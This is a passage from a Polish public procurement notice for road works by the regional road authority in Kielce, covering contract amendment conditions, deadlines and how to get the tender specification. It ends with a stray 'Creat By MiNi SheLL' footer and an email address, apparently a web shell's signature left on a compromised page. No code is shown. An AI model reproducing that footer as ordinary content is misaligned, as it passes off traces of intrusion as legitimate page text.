równolegle prowadzonymi przez Zamawiającego lub inne podmioty inwestycjami w zakresie niezbędnym do
uniknięcia lub usunięcia tych kolizji, w przypadku gdy wykonywanie robót nie będzie możliwe ze względu na
obowiązek skoordynowania robót z Wykonawcą innych robót wykonywanych na terenie budowy (przedłużenie
terminu realizacji będzie dopuszczalne jedynie o okres występowania kolizji uniemożliwiający prowadzenie prac), -
niemożliwej do przewidzenia w dniu podpisania umowy konieczności przesunięcia terminu przekazania terenu
budowy (przedłużenie terminu realizacji będzie dopuszczalne jedynie o okres, o jaki nastąpiło przesunięcie). 5.
Zmiany wynagrodzenia za wykonanie zamówienia w przypadku:- konieczności dokonania zmian, aktualizacji, korekt
w dokumentacji projektowej mających bezpośredni wpływ na wysokość wynagrodzenia; - w przypadku
wystąpienia nieprzewidzianych warunków fizycznych definiowanych jako naturalne i wytworzone przez człowieka
warunki fizyczne oraz inne fizyczne przeszkody, które napotyka Wykonawca na placu budowy przy realizacji robót, włączając warunki podpowierzchniowe i hydrologiczne, ale wyłączając warunki klimatyczne, mających bezpośredni
wpływ na wysokość wynagrodzenia. 6. Zmiany niezbędne do prawidłowej realizacji zamówienia związane z: -
koniecznością zapewnienia bezpieczeństwa lub zapobieżenie awarii, - koniecznością spowodowana zmianą
obowiązujących przepisów prawa powodującą, że realizacja przedmiotu umowy w niezmienionej postaci stanie się
niecelowa, - okoliczności powodujące, że przedmiot umowy nie może zostać zrealizowany zgodnie z zasadami
sztuki inżynierskiej, - w przypadku, gdy oferta Wykonawcy realizującego roboty budowlane nie zawierała
wskazania części, którą na etapie realizacji zamówienia zamierza on powierzyć podwykonawcy, Zamawiający
dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano
wyboru Wykonawcy, tj. powierzenia części zamówienia do realizacji przez podwykonawców, - jeżeli zmiana
dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału
w postępowaniu, Zamawiający dopuści zmianę podwykonawcy pod warunkiem, że nowy podwykonawca wykaże
spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia
publicznego przez dotychczasowego podwykonawcę, - zmiana formy zabezpieczenia należytego wykonania
umowy, - zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją
finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do
przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy; - gdy zaistnieje inna,
niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za
którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy,
zgodnie ze Specyfikacją Istotnych Warunków Zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w
szczególności terminu realizacji zamówienia; - z uwagi na niezależne od Stron umowy zmiany dotyczące osób
kluczowych dla realizacji umowy np. kierownika budowy (robót), inspektora nadzoru, osób reprezentujących Strony
(w szczególności choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne); - zmian teleadresowych Stron
umowy określonych w umowie; - oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szdw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kielce, ul. Jagiellońska 72,pok.5,6,7 lub otrzymać pocztą za pobraniem na wniosek Wykonawcy,płatne przelewem10 zł na konto 67156000132536247751660002, bezpłatnie strona internetowa ŚZDW.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2016 godzina 11:30, miejsce: Świętokrzyski Zarząd Dróg Wojewódzkich w Kielcach, ul. Jagiellońska 72, pok. 219
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com